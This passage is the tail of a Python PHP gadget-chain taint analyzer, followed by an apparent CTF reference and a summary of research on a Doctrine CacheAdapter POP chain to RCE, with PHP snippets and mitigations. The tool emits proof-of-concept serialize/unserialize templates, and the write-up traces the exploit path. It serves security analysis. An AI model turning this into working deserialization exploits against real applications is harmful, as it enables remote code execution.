                                # Only if variable_call is marked in method data (not just call_site, which doesn't have it directly unless we look it up)
                                # We can check call_site type or if resolve failed for variable call
                                if not fallback_key and call_site.call_type == 'function':
                                    # It's a function call, maybe variable function?
                                    # We need to check if it was a variable call. CallSite has 'variable' field? No, 'callee_method' has name.
                                    # Wait, _process_call sets 'variable_call' in calls dict, but CallSite object only has names.
                                    # However, if callee_method is a variable name (starts with $? no it holds the name).
                                    # Actually _process_call sets callee_method=var_name if implicit.
                                    # If we assume any unresolved variable function call could be __invoke:
                                    # We check if we can find ANY class with __invoke that is relevant?
                                    # Without type inference, we might just check if any class has __invoke. 
                                    # That is too broad. 
                                    # But if we have object injection context, maybe we assume valid object?
                                    # For now, let's skip __invoke global search to avoid massive FPs, unless we track variable types.
                                    pass
    
                                if fallback_key and fallback_key in self.walker.methods:
                                    if fallback_key not in self.tainted_methods:
                                        confidence = self.tainted_methods[method_key] * 0.85
                                        self.tainted_methods[fallback_key] = confidence
                                        changed = True
                
                if not changed:
                    break
            
            print(f"    ✓ Taint propagated through {iteration} iterations")
            print(f"    ✓ Found {len(self.tainted_methods)} tainted methods")
        
        def _resolve_method(self, method_name: str, variable: Optional[str], current_class: str) -> Optional[str]:
            """Resolve method call to actual method key"""
            if not method_name:
                return None
            
            if variable == 'this':
                method_key = self.walker.resolve_method_in_hierarchy(current_class, method_name)
                if method_key:
                    return method_key
            
            return self.walker.find_method_by_name(method_name)
    
        def _class_has_entry_point(self, class_name: str) -> bool:
            """Determine if a class (or its ancestors) exposes an entry point"""
            for entry in self.ENTRY_POINTS:
                if self.walker.resolve_method_in_hierarchy(class_name, entry):
                    return True
            return False
    
        def _collect_injectable_properties(self, class_name: str) -> List[str]:
            """Collect unique property names accessed across class hierarchy"""
            props: List[str] = []
            seen: Set[str] = set()
            
            for lineage_class in self.walker.get_class_lineage(class_name):
                class_data = self.walker.classes.get(lineage_class)
                if not class_data:
                    continue
                
                for method_data in class_data['methods'].values():
                    for prop_access in method_data.get('property_accesses', []):
                        prop_name = prop_access['name']
                        if prop_name and prop_name not in seen:
                            seen.add(prop_name)
                            props.append(prop_name)
            
            return props
        
        def _analyze_injectable_objects(self) -> Dict[str, List[str]]:
            """Analyze which objects can be injected to trigger chains"""
            injectable = {}
            
            for class_name in self.walker.classes.keys():
                if not self._class_has_entry_point(class_name):
                    continue
                
                props = self._collect_injectable_properties(class_name)
                injectable[class_name] = props
            
            return injectable
        
        def _detect_gadget_chains_streaming(self, injectable: Dict[str, List[str]], 
                                            stream_output: bool = True) -> List[GadgetChain]:
            """Build gadget chains from every entry method to the sinks it can reach.

            Args:
                injectable: Class name -> property names, as produced by
                    ``_analyze_injectable_objects``.
                stream_output: When true, print a progress line every fifth
                    entry point and a summary of each chain as it is created.

            Returns:
                All chains whose confidence is at least 0.4, numbered from 1 in
                discovery order.
            """
            # Distinct locations of property sources, in order of first appearance.
            entry_methods = list(dict.fromkeys(
                source.location
                for source in self.taint_sources
                if source.source_type == 'property'
            ))
            total_entries = len(entry_methods)
            chains = []

            for position, entry_method in enumerate(entry_methods, start=1):
                if stream_output and position % 5 == 0:
                    print(f"    ... scanning entry point {position}/{total_entries}")

                for found in self._find_paths_bfs(entry_method, max_depth=6):
                    path = found['path']
                    sink = found['sink']

                    # Classes on the path that an attacker could instantiate.
                    chain_injectable = []
                    for step in path:
                        method = step.get('method', '')
                        owner = method.split('::')[0] if '::' in method else ''
                        if owner not in injectable:
                            continue
                        chain_injectable.append({
                            'class': owner,
                            'properties': injectable[owner]
                        })

                    confidence = self._calculate_confidence(path, sink, chain_injectable)
                    if confidence < 0.4:
                        # Too speculative to report.
                        continue

                    exploit_notes = self._generate_exploit_notes(path, sink, chain_injectable)
                    description = self._generate_description(path, sink)

                    chain = GadgetChain(
                        chain_id=len(chains) + 1,
                        entry_points=[entry_method],
                        chain_path=path,
                        sink=sink,
                        severity=sink.severity,
                        confidence=confidence,
                        description=description,
                        injectable_objects=chain_injectable,
                        exploitation_notes=exploit_notes
                    )
                    chains.append(chain)

                    if stream_output:
                        self._print_chain_summary(chain)

            return chains
        
        def _print_chain_summary(self, chain: GadgetChain):
            """Print a short, human-readable summary of one detected chain.

            Shows the severity and confidence, the first four path steps with
            their definition locations, the sink location and up to two
            injectable class names, followed by a blank line.
            """
            markers = {
                TaintLevel.CRITICAL: "🔴",
                TaintLevel.HIGH: "🟠",
                TaintLevel.MEDIUM: "🟡",
                TaintLevel.LOW: "🟢"
            }
            marker = markers.get(chain.severity, "⚪")
            print(f"{marker} CHAIN #{chain.chain_id} [{chain.severity.name}] Confidence: {chain.confidence:.0%}")

            def describe(step):
                # "<method> (<file>[:<line>])"; the line is omitted when it is 0.
                where = step.get('method_file') or 'Unknown file'
                line_no = step.get('method_line', 0)
                if line_no:
                    where = f"{where}:{line_no}"
                return f"{step.get('method', '?')} ({where})"

            steps = chain.chain_path
            preview = [describe(step) for step in steps[:4]]
            if len(steps) > 4:
                preview.append("...")
            path_str = " → ".join(preview)
            print(f"   Path: {path_str}")

            sink = chain.sink
            sink_path = sink.filepath or 'Unknown file'
            print(f"   Sink: {sink.function}() at {sink_path}:{sink.line}")

            if chain.injectable_objects:
                shown = ', '.join(obj['class'] for obj in chain.injectable_objects[:2])
                print(f"   Injectable: {shown}")

            print()
        
        def _find_paths_bfs(self, start_method: str, max_depth: int = 6) -> List[Dict]:
            """Find paths from start to sinks using BFS - optimized version"""
            paths = []
            start_step = self._create_path_step(start_method, step_type='entry')
            queue = deque([(start_method, [start_step], 0)])
            visited = set()
            
            # Early termination if we find enough paths
            max_paths_per_entry = 10
            
            while queue and len(paths) < max_paths_per_entry:
                current, path, depth = queue.popleft()
                
                if depth > max_depth:
                    continue
                
                state_key = (current, tuple(p['method'] for p in path))
                if state_key in visited:
                    continue
                visited.add(state_key)
                
                # Check if current method contains sinks
                for sink in self.taint_sinks:
                    sink_method = f"{sink.class_name}::{sink.method_name}"
                    if sink_method == current:
                        # Verify taint reaches sink
                        if self._verify_taint_flow(path):
                            paths.append({'path': path.copy(), 'sink': sink})
                            # Continue searching for more paths
                
                # Don't expand too much if we already have paths from this entry
                if len(paths) >= max_paths_per_entry:
                    break
                
                # Follow calls
                for call_site in self.call_graph.get(current, []):
                    if call_site.callee_class:
                        next_method = self.walker.resolve_method_in_hierarchy(
                            call_site.callee_class,
                            call_site.callee_method
                        )
                    else:
                        next_method = self._resolve_method(
                            call_site.callee_method,
                            call_site.variable,
                            call_site.caller_class
                        )
                    
                    if next_method and next_method in self.walker.methods:
                        # Avoid revisiting in this path
                        if any(step['method'] == next_method for step in path):
                            continue
                        
                        new_step = self._create_path_step(
                            next_method,
                            step_type='call',
                            call_type=call_site.call_type,
                            caller_method=current,
                            call_line=call_site.line
                        )
                        new_path = path + [new_step]
                        queue.append((next_method, new_path, depth + 1))
            
            return paths
        
        def _create_path_step(
            self,
            method_name: str,
            step_type: str,
            call_type: Optional[str] = None,
            caller_method: Optional[str] = None,
            call_line: Optional[int] = None
        ) -> Dict[str, Any]:
            """Build a standardized path step with metadata"""
            method_info = self.walker.methods.get(method_name, {})
            class_name = method_name.split('::')[0] if '::' in method_name else ''
            method_file = method_info.get('filepath', '')
            method_line = method_info.get('line', 0)
            
            caller_info = self.walker.methods.get(caller_method, {}) if caller_method else {}
            
            return {
                'method': method_name,
                'class': class_name,
                'type': step_type,
                'call_type': call_type or ('entry' if step_type == 'entry' else ''),
                'method_file': method_file,
                'method_line': method_line,
                'line': call_line if call_line is not None else method_line,
                'call_line': call_line if call_line is not None else 0,
                'call_file': caller_info.get('filepath', ''),
            }
        
        def _verify_taint_flow(self, path: List[Dict]) -> bool:
            """Verify that taint flows through the path"""
            for step in path:
                method = step.get('method', '')
                if method in self.tainted_methods:
                    return True
            return False
        
        def _calculate_confidence(self, path: List[Dict], sink: TaintSink, 
                                injectable: List[Dict]) -> float:
            """Score how likely a chain is to be exploitable.

            The score is the product of a base of 0.6 and five factors, capped
            at 0.99 and rounded to two decimals:

            * length: 1.0 for a single step, minus 0.12 per further step,
              never below 0.3;
            * entry: 1.3 when the first step's method key contains an
              ``ENTRY_POINTS`` name, else 1.0;
            * severity: 1.0 / 0.85 / 0.7 / 0.5 for CRITICAL / HIGH / MEDIUM /
              LOW (0.5 for anything else);
            * injectable: 1.2 when *injectable* is non-empty, else 0.8;
            * taint: the highest ``tainted_methods`` confidence among the path's
              steps, or 1.0 when no step is tainted.

            Args:
                path: Chain steps; must contain at least the entry step.
                sink: The sink the chain ends in.
                injectable: Injectable-class records for the chain.

            Returns:
                Confidence in the range 0-0.99.
            """
            base = 0.6

            # Shorter chains are more reliable.
            length_factor = max(0.3, 1.0 - (len(path) - 1) * 0.12)

            # Chains starting at a recognised entry point are more significant.
            entry = path[0].get('method', '')
            entry_factor = 1.3 if any(ep in entry for ep in self.ENTRY_POINTS) else 1.0

            severity_map = {
                TaintLevel.CRITICAL: 1.0,
                TaintLevel.HIGH: 0.85,
                TaintLevel.MEDIUM: 0.7,
                TaintLevel.LOW: 0.5
            }
            severity_factor = severity_map.get(sink.severity, 0.5)

            # Injectable objects increase confidence.
            inject_factor = 1.2 if injectable else 0.8

            # Strongest taint along the path. This used to start at 1.0 and be
            # combined with max(), which left it at 1.0 for every confidence
            # this class assigns (all <= 0.95), so taint never influenced the
            # score.
            taint_scores = [
                self.tainted_methods[step.get('method', '')]
                for step in path
                if step.get('method', '') in self.tainted_methods
            ]
            taint_factor = max(taint_scores, default=1.0)

            confidence = min(
                0.99,
                base * length_factor * entry_factor * severity_factor
                * inject_factor * taint_factor
            )
            return round(confidence, 2)
        
        def _generate_description(self, path: List[Dict], sink: TaintSink) -> str:
            """Generate chain description"""
            entry = path[0].get('method', 'Unknown')
            def format_step(step: Dict[str, Any]) -> str:
                method = step.get('method', '?')
                method_file = step.get('method_file') or 'Unknown file'
                method_line = step.get('method_line', 0)
                if method_line:
                    return f"{method} ({method_file}:{method_line})"
                return f"{method} ({method_file})"
            
            chain_str = " → ".join([format_step(p) for p in path])
            
            return (f"Gadget chain from {entry} to {sink.function}(). "
                    f"Path: {chain_str}")
        
        def _generate_exploit_notes(self, path: List[Dict], sink: TaintSink,
                                   injectable: List[Dict]) -> str:
            """Generate detailed exploitation guidance"""
            notes = []
            
            entry = path[0].get('method', 'Unknown')
            notes.append(f"**Entry Point:** {entry}")
            sink_path = sink.filepath or 'Unknown file'
            notes.append(f"**Sink:** {sink.function}() [{sink.severity.name}] at {sink_path}:{sink.line}")
            notes.append(f"**Chain Length:** {len(path)} steps\n")
            
            if injectable:
                notes.append("**Injectable Classes:**")
                for obj in injectable:
                    cls = obj['class']
                    props = obj['properties']
                    notes.append(f"  • {cls}")
                    if props:
                        notes.append(f"    Properties: {', '.join(props[:5])}")
                        if len(props) > 5:
                            notes.append(f"    ... and {len(props) - 5} more")
                notes.append("")
            
            # Add PoC template
            if injectable and any('__wakeup' in entry or '__destruct' in entry for entry in [path[0].get('method', '')]):
                notes.append("**Proof of Concept:**")
                notes.append("```php")
                target_class = injectable[0]['class']
                target_props = injectable[0]['properties']
                notes.append(f"$exploit = new {target_class}();")
                for prop in target_props[:3]:
                    notes.append(f"$exploit->{prop} = 'PAYLOAD';  // Control this")
                notes.append("$serialized = serialize($exploit);")
                notes.append("// Trigger: unserialize($serialized);")
                notes.append("```\n")
            
            # Add chain visualization
            notes.append("**Execution Flow:**")
            for i, step in enumerate(path, 1):
                method = step.get('method', 'Unknown')
                call_type = step.get('call_type', 'entry')
                method_file = step.get('method_file') or 'Unknown file'
                method_line = step.get('method_line', 0)
                call_file = step.get('call_file') or 'Unknown file'
                call_line = step.get('call_line', 0)
                
                base = f"  {i}. {method} [{call_type}]"
                location = f"{method_file}:{method_line}" if method_line else method_file
                base += f" — defined at {location}"
                
                if call_type != 'entry':
                    if call_line:
                        call_location = f"{call_file}:{call_line}"
                    else:
                        call_location = call_file
                    base += f" (invoked from {call_location})"
                
                notes.append(base)
            
            return "\n".join(notes)
    
    
    class Reporter:
        """Collect gadget chains and render them as a text or JSON report."""

        # Severity names in the order they are listed in the breakdown.
        _SEVERITY_ORDER = ('CRITICAL', 'HIGH', 'MEDIUM', 'LOW')
        # Marker per severity; the same mapping the command-line summary in
        # main() uses, so both outputs label a severity identically.
        _SEVERITY_EMOJI = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}
        _DEFAULT_EMOJI = '⚪'

        def __init__(self):
            self.chains: List[GadgetChain] = []

        def add_chains(self, chains: List[GadgetChain]):
            """Append ``chains`` to the chains covered by later reports."""
            self.chains.extend(chains)

        def _count_by_severity(self) -> Dict[str, int]:
            """Return ``{severity name: number of chains}`` in first-seen order."""
            counts = defaultdict(int)
            for chain in self.chains:
                counts[chain.severity.name] += 1
            return dict(counts)

        @classmethod
        def _emoji_for(cls, severity_name: str) -> str:
            """Return the marker for ``severity_name`` (neutral if unknown)."""
            return cls._SEVERITY_EMOJI.get(severity_name, cls._DEFAULT_EMOJI)

        @staticmethod
        def _format_step(step: Dict) -> str:
            """Render one chain step as a bullet line of the execution flow."""
            method = step.get('method', 'Unknown')
            call_type = step.get('call_type', 'entry')
            method_file = step.get('method_file') or 'Unknown file'
            method_line = step.get('method_line', 0)

            # Line numbers are appended only when known (non-zero).
            location = f"{method_file}:{method_line}" if method_line else method_file
            text = f"  • {method} [{call_type}] — defined at {location}"

            if call_type != 'entry':
                call_file = step.get('call_file') or 'Unknown file'
                call_line = step.get('call_line', 0)
                call_location = f"{call_file}:{call_line}" if call_line else call_file
                text += f" (invoked from {call_location})"
            return text

        def generate_text_report(self) -> str:
            """Return the detailed text report.

            Chains are listed from highest to lowest ``(severity.value,
            confidence)``. When no chains were added, a single "no gadget
            chains" line is returned instead.
            """
            if not self.chains:
                return "\n✓ No gadget chains detected.\n"

            rule = "=" * 100
            lines = [
                "\n" + rule,
                " PHP GADGET CHAIN ANALYSIS - DETAILED REPORT",
                rule,
                f"\nTotal Chains: {len(self.chains)}",
            ]

            # Statistics
            by_severity = self._count_by_severity()
            lines.append("\nSeverity Breakdown:")
            for severity in self._SEVERITY_ORDER:
                count = by_severity.get(severity, 0)
                if count > 0:
                    lines.append(f"  {self._emoji_for(severity)} {severity}: {count}")

            lines.append("\n" + rule)

            sorted_chains = sorted(
                self.chains,
                key=lambda c: (c.severity.value, c.confidence),
                reverse=True
            )

            for chain in sorted_chains:
                severity_name = chain.severity.name
                lines.append(f"\n{rule}")
                lines.append(
                    f"{self._emoji_for(severity_name)} CHAIN #{chain.chain_id} - "
                    f"{severity_name} SEVERITY (Confidence: {chain.confidence:.0%})"
                )
                lines.append(rule)

                sink_path = chain.sink.filepath or 'Unknown file'
                lines.append(f"\nSink Location: {sink_path}:{chain.sink.line}")
                lines.append("\nExecution Flow:")
                lines.extend(self._format_step(step) for step in chain.chain_path)
                lines.append(f"\n{chain.description}\n")
                lines.append(chain.exploitation_notes)
                lines.append("")

            lines.append(rule)
            return "\n".join(lines)

        def generate_json_report(self) -> str:
            """Return the report as a JSON document (2-space indent).

            Top-level keys: ``total_chains``, ``severity_breakdown`` and
            ``chains``; chains appear in the order they were added.
            """
            data = {
                'total_chains': len(self.chains),
                'severity_breakdown': self._count_by_severity(),
                'chains': []
            }

            for chain in self.chains:
                data['chains'].append({
                    'id': chain.chain_id,
                    'severity': chain.severity.name,
                    'confidence': chain.confidence,
                    'entry_points': chain.entry_points,
                    'sink': {
                        'function': chain.sink.function,
                        'location': chain.sink.location,
                        'filepath': chain.sink.filepath,
                        'severity': chain.sink.severity.name,
                        'line': chain.sink.line
                    },
                    'path': [
                        {
                            'method': step.get('method', ''),
                            'class': step.get('class', ''),
                            'type': step.get('type', ''),
                            'call_type': step.get('call_type', ''),
                            'method_file': step.get('method_file', ''),
                            'method_line': step.get('method_line', 0),
                            'call_file': step.get('call_file', ''),
                            'call_line': step.get('call_line', 0),
                            'line': step.get('line', 0)
                        }
                        for step in chain.chain_path
                    ],
                    'injectable_objects': chain.injectable_objects,
                    'description': chain.description
                })

            return json.dumps(data, indent=2)
    
    
    class GadgetChainAnalyzer:
        """Drive the pipeline: parse PHP sources, walk the ASTs, run taint analysis."""

        def __init__(self):
            # Without a working parser nothing else can run, so a RuntimeError
            # from the parser is reported and the process exits with status 1.
            try:
                self.parser = PHPASTParser()
            except RuntimeError as exc:
                for message in (
                    f"\n❌ Error: {exc}",
                    "\nInstallation instructions:",
                    "  1. Ensure PHP ast extension is installed (e.g., sudo apt-get install php-ast)",
                    "  2. Or install python wrapper: pip install php-ast",
                ):
                    print(message)
                sys.exit(1)

            self.reporter = Reporter()

        def analyze_directory(self, directory: str, recursive: bool = True, stream_output: bool = True) -> List[GadgetChain]:
            """Parse every PHP file under ``directory`` and return the detected chains.

            Files that fail to parse are reported and counted but do not stop
            the run. An empty list is returned when no PHP file is found or
            none parses successfully.
            """
            print(f"\n📁 Scanning directory: {directory}")
            mode_label = '✓ enabled' if recursive else '✗ disabled'
            print(f"   Recursive mode: {mode_label}")

            targets = self._find_php_files(directory, recursive)
            if not targets:
                print("\n❌ No PHP files found!")
                return []

            total = len(targets)
            print(f"\n📄 Found {total} PHP file(s)\n")

            successes = []
            failures = 0
            for position, target in enumerate(targets, 1):
                try:
                    print(f"  [{position}/{total}] Parsing: {target}")
                    outcome = self.parser.parse_file(target)

                    if not outcome['success']:
                        print(f"              ✗ Failed: {outcome.get('error', 'Unknown error')}")
                        failures += 1
                        continue

                    successes.append(outcome)
                    print("              ✓ Success")
                except Exception as e:
                    print(f"              ✗ Exception: {e}")
                    failures += 1

            print(f"\n📊 Parsing complete: {len(successes)} success, {failures} failed\n")

            if not successes:
                print("❌ No files successfully parsed")
                return []

            # Feed every parsed file into one walker so the analysis sees all of them.
            print("🔍 Analyzing AST...")
            walker = ASTWalker()
            for outcome in successes:
                walker.walk(outcome)

            print(f"   ✓ Found {len(walker.classes)} classes")
            print(f"   ✓ Found {len(walker.methods)} methods")
            print(f"   ✓ Found {len(walker.calls)} call sites")
            print(f"   ✓ Found {len(walker.property_accesses)} property accesses\n")

            print("🔬 Performing taint analysis...")
            return AdvancedTaintAnalyzer(walker).analyze(stream_output=stream_output)

        def analyze_file(self, filepath: str, stream_output: bool = True) -> List[GadgetChain]:
            """Parse the single file ``filepath`` and return the detected chains.

            Returns an empty list when the parser reports failure.
            """
            print(f"\n📄 Analyzing file: {filepath}\n")

            outcome = self.parser.parse_file(filepath)
            if not outcome['success']:
                print(f"❌ Failed to parse: {outcome.get('error')}")
                return []

            walker = ASTWalker()
            walker.walk(outcome)

            print(f"   ✓ Found {len(walker.classes)} classes")
            print(f"   ✓ Found {len(walker.methods)} methods\n")

            print("🔬 Performing taint analysis...")
            return AdvancedTaintAnalyzer(walker).analyze(stream_output=stream_output)

        def _find_php_files(self, directory: str, recursive: bool) -> List[str]:
            """Return the sorted paths of ``*.php`` files in ``directory``.

            With ``recursive`` the whole tree is walked; otherwise only the
            directory itself is searched. A missing path or a non-directory
            prints an error and yields an empty list.
            """
            base = Path(directory)

            if not base.exists():
                print(f"❌ Error: Directory '{directory}' does not exist")
                return []

            if not base.is_dir():
                print(f"❌ Error: '{directory}' is not a directory")
                return []

            if not recursive:
                return sorted(str(entry) for entry in base.glob('*.php') if entry.is_file())

            found = [
                os.path.join(folder, name)
                for folder, _subdirs, names in os.walk(directory)
                for name in names
                if name.endswith('.php')
            ]
            return sorted(found)
    
    
    def main():
        """Command-line entry point: parse arguments, analyze, report and exit.

        Exit status: 2 when a CRITICAL chain survives filtering (also used by
        argparse for usage errors), 1 when any other chain survives or when the
        analysis fails, is interrupted, or php-ast is unavailable, 0 when no
        chain remains.
        """
        parser = argparse.ArgumentParser(
            description='Advanced PHP Gadget Chain Taint Analyzer',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      %(prog)s -d /path/to/php/project -r
      %(prog)s -f vulnerable.php -o json
      %(prog)s -d /var/www --min-confidence 0.7 --min-severity HIGH
    
    Requirements:
      pip install php-ast
    
    Note: php-ast requires PHP with the ast extension enabled.
          See: https://github.com/nikic/php-ast
            """
        )

        parser.add_argument('-d', '--directory', help='Directory to analyze')
        parser.add_argument('-f', '--file', help='Single file to analyze')
        parser.add_argument('-r', '--recursive', action='store_true',
                           help='Recursively scan directory')
        parser.add_argument('-o', '--output', choices=['text', 'json'],
                           default='text', help='Output format (default: text)')
        parser.add_argument('--min-confidence', type=float, default=0.0,
                           help='Minimum confidence threshold (0.0-1.0)')
        parser.add_argument('--min-severity',
                           choices=['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'],
                           help='Minimum severity level')
        parser.add_argument('--show-all', action='store_true',
                           help='Show all chains including low confidence')
        parser.add_argument('--no-stream', action='store_true',
                           help='Disable streaming output (show all results at end)')
        parser.add_argument('--summary-only', action='store_true',
                           help='Show only summary, not full details')

        args = parser.parse_args()

        if not args.directory and not args.file:
            parser.error('Either --directory or --file must be specified')

        # Check if php-ast is available
        if not PHP_AST_AVAILABLE:
            print("\n❌ Error: php-ast module is not installed")
            print("\nInstallation instructions:")
            print("  1. Install PHP ast extension:")
            print("     - Ubuntu/Debian: sudo apt-get install php-ast")
            print("     - Or compile from source: https://github.com/nikic/php-ast")
            print("  2. Install Python package:")
            print("     pip install php-ast")
            sys.exit(1)

        analyzer = GadgetChainAnalyzer()

        # Perform analysis; --directory takes precedence when both are given.
        try:
            stream_output = not args.no_stream

            if args.directory:
                chains = analyzer.analyze_directory(args.directory, args.recursive, stream_output)
            else:
                chains = analyzer.analyze_file(args.file, stream_output)
        except KeyboardInterrupt:
            print("\n\n⚠️  Analysis interrupted by user")
            sys.exit(1)
        except Exception as e:
            print(f"\n❌ Error during analysis: {e}")
            import traceback
            traceback.print_exc()
            sys.exit(1)

        # Filter chains. --show-all skips the confidence filter unless an
        # explicit positive threshold was requested.
        filtered_chains = chains

        if not args.show_all or args.min_confidence > 0:
            filtered_chains = [c for c in filtered_chains if c.confidence >= args.min_confidence]

        if args.min_severity:
            min_level = TaintLevel[args.min_severity]
            filtered_chains = [c for c in filtered_chains if c.severity.value >= min_level.value]

        # Generate report
        analyzer.reporter.add_chains(filtered_chains)

        severity_emoji = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}
        rule = "=" * 100

        if args.output == 'json':
            print(analyzer.reporter.generate_json_report())
        elif args.summary_only:
            # Just print summary
            print("\n" + rule)
            print(f"📊 FINAL SUMMARY: {len(filtered_chains)} chains detected")
            print(rule)

            by_severity = defaultdict(int)
            for chain in filtered_chains:
                by_severity[chain.severity.name] += 1

            print("\nSeverity Breakdown:")
            for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
                count = by_severity.get(severity, 0)
                if count > 0:
                    print(f"  {severity_emoji.get(severity, '⚪')} {severity}: {count}")
        elif args.no_stream:
            # Nothing was streamed during analysis, so print the full report now.
            print(analyzer.reporter.generate_text_report())
        else:
            # Details were already streamed; print a compact summary only.
            print("\n" + rule)
            print("📊 SUMMARY OF ALL DETECTED CHAINS")
            print(rule)

            # Group by severity
            sorted_chains = sorted(filtered_chains, key=lambda c: (c.severity.value, c.confidence), reverse=True)
            current_severity = None

            for chain in sorted_chains:
                if chain.severity.name != current_severity:
                    current_severity = chain.severity.name
                    emoji = severity_emoji.get(current_severity, '⚪')
                    print(f"\n{emoji} {current_severity} SEVERITY CHAINS")
                    print("-" * 100)

                # Sink info
                sink_file = chain.sink.filepath or 'Unknown'

                print(f"Chain #{chain.chain_id:<3} | Conf: {chain.confidence:.0%} | Sink: {chain.sink.function}()")
                print(f"  Location: {sink_file}:{chain.sink.line}")

                # Entry info. `or` (not a .get default) so that a stored
                # None/empty file name also falls back to 'Unknown'.
                if chain.chain_path:
                    entry_step = chain.chain_path[0]
                    entry_method = entry_step.get('method', '?')
                    entry_file = entry_step.get('method_file') or 'Unknown'
                    print(f"  Entry:    {entry_method} in {entry_file}:{entry_step.get('method_line', 0)}")

                # Injectable info
                if chain.injectable_objects:
                    objs = [o['class'] for o in chain.injectable_objects]
                    objs_str = ", ".join(objs[:2])
                    if len(objs) > 2:
                        objs_str += f" (+{len(objs)-2} more)"
                    print(f"  Trigger:  new {objs_str}")

                # Flow
                print("  Flow:")
                for i, step in enumerate(chain.chain_path, 1):
                    method = step.get('method', '?')
                    file_path = step.get('method_file') or 'Unknown'
                    line_num = step.get('method_line', 0)
                    print(f"    {i}. {method} in {file_path}:{line_num}")
                print("")

            print("💡 Use --no-stream for full details of all chains")

        # Exit codes
        if not filtered_chains:
            print("\n✅ No significant vulnerabilities detected")
            sys.exit(0)

        critical_chains = [c for c in filtered_chains if c.severity == TaintLevel.CRITICAL]
        high_chains = [c for c in filtered_chains if c.severity == TaintLevel.HIGH]

        if critical_chains:
            print(f"\n⚠️  {len(critical_chains)} CRITICAL severity chain(s) found!")
            sys.exit(2)
        if high_chains:
            print(f"\n⚠️  {len(high_chains)} HIGH severity chain(s) found!")
        # Any remaining chain, whatever its severity, is reported as status 1.
        sys.exit(1)
    
    
    # Run the command-line interface only when executed as a script,
    # not when this module is imported.
    if __name__ == '__main__':
        main()
    Intended

    The official solver has not been uploaded yet, but the author sent this to the server as a reference:

    https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1

    the solver added Drupal RCE gadget chain · anzuukino/phpggc@d0ac1bc

    TL;DR

  • A POP chain was found starting from Doctrine\Common\Cache\Psr6\CacheAdapter::__destruct(), which calls commit().
  • Because PHP lets an attacker control object-typed properties during deserialization, calls inside commit() (e.g., get(), save(), delete()) can be redirected to attacker-controlled classes.
  • The delete() path can flow into PhpArrayAdapter::initialize() which uses a vulnerable include, allowing full RCE if the attacker can already write a file to disk (first prerequisite).

  • Article Summary

    The goal was to identify a valid POP chain inside the doctrine/doctrine-bundle dependency stack (downloaded 144M+ times). The research relies primarily on static analysis to identify a deserialization entrypoint and the sequence of method calls that lead to a vulnerable include.


    Methodology Highlights

  • Finding the entrypoint

      Search for PHP magic methods invoked automatically during deserialization, primarily __wakeup, __unserialize, and __destruct.

  • Initial target selection

      The deprecated but still-included class Doctrine\Common\Cache\Psr6\CacheAdapter was chosen because its __destruct() directly calls commit(). Many other Symfony classes defend against POP chains by throwing BadMethodCallException inside __wakeup(); CacheAdapter did not.

  • Chain construction

      Inside commit(), code invokes methods such as getExpiry(), get(), save(), and delete() on properties like $this->cache and members of $this->deferredItems. Due to PHP’s weak typing, an attacker controlling the object graph produced from deserialization can make those properties reference attacker-controlled objects/classes.

  • Achieving code execution

      The chain uses delete() to reach PhpArrayAdapter via CacheTrait::delete() → deleteItem() → PhpArrayAdapter::initialize(). The latter has an include of a file path that can be influenced if the attacker is able to write a file to disk — completing the RCE chain.


  • Impact

  • Preconditions: PHP unserialization must be possible in the target environment, and the attacker must already be able to write a file to disk (local file write).
  • Consequence: If both preconditions are met, the POP chain enables Remote Code Execution (RCE) via the include in PhpArrayAdapter::initialize().

  • Example Code and Analysis Snippets

    Below are the key snippets and commands used during static analysis and chain construction.

    1. Locating __destruct without __wakeup protection

    Search the dependency tree for classes implementing __destruct, then filter out those whose __wakeup() defends by throwing BadMethodCallException:

    # Search for classes implementing __destruct without a __wakeup protection
    $ grep -rl '__destruct' | xargs grep -L BadMethodCallException
    doctrine/cache/lib/Doctrine/Common/Cache/Psr6/CacheAdapter.php
    # ... other results
    

    2. The CacheAdapter entrypoint

    CacheAdapter::__destruct() immediately calls commit() — a controllable jump-start for the POP chain:

    <?php namespace Doctrine\Common\Cache\Psr6;
    
    final class CacheAdapter implements CacheItemPoolInterface {
        // [...]
        public function __destruct() {
            // This call is the start of the POP chain
            $this->commit();
        }
    }
    

    3. commit() — how attacker-controlled properties are used

    Fields that an attacker can influence during deserialization:

    <?php namespace Doctrine\Common\Cache\Psr6;
    
    final class CacheAdapter implements CacheItemPoolInterface {
        /** @var Cache */                       // Controlled by the attacker
        private $cache;
    
        /** @var array<CacheItem|TypedCacheItem> */
        private $deferredItems = [];           // Controlled by the attacker
    
        // [...]
    
        public function commit(): bool {
            // ... loop through $this->deferredItems
    
            // Example interactions on controlled objects:
            // [2] $byLifetime[(int) $lifetime][$key] = $item->get();
    
            // [4] Final call that leads to RCE chain:
            switch (count($expiredKeys)) {
                case 0:
                    break;
                case 1:
                    $this->cache->delete(current($expiredKeys)); // <--- chosen jump point
                    break;
                default:
                    $this->doDeleteMultiple($expiredKeys);
                    break;
            }
    
            // [3] return $this->cache->save($key, $item->get(), (int) $lifetime);
            // ...
        }
    }
    

    4. The final link: delete() → trait → PhpArrayAdapter::initialize()

    CacheTrait::delete() funnels into deleteItem(). When the implementation is PhpArrayAdapter, deleteItem() leads to PhpArrayAdapter::initialize() which contains an include on a filesystem path — the step that makes RCE possible if the attacker can place a file there.

    # Showing the delete wrapper from the CacheTrait
    $ cat ./symfony/cache-contracts/CacheTrait.php | grep 'function delete(' -A 3
    public function delete(string $key): bool {
        return $this->deleteItem($key);
    }
    

    (From there, tracing the concrete implementation of deleteItem() to PhpArrayAdapter::initialize() reveals the vulnerable include.)


    Mitigations & Recommendations

  • Avoid PHP unserialize() on untrusted input. Use safe serialization formats (JSON, msgpack with safe decoding) or data signing to ensure integrity.
  • Patch or upgrade the vulnerable dependency to a version where the POP chain is closed or classes are hardened against this pattern. (Check vendor advisories and changelogs.)
  • Harden file-write permissions and prevent attackers from writing arbitrary files to disk (principle of least privilege). Even if a POP chain exists, denying file-write capability blocks the final RCE step.
  • Use runtime defenses such as disabling dangerous include paths, using open_basedir, or applying code-hardening tools that detect suspicious deserialization patterns.
